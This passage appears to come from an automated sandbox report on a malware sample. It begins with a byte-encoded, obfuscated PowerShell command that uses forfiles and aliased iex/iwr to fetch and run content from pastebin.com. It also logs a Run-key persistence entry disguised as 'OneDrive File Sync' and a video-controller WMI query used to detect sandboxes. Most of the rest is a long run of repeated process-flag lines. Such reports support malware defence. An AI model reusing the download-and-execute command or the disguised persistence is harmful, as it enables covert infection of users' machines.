,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: NULL
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\vF20HtY4a4.exe Memory allocated: 1FD063A0000 memory reserve | memory write watch
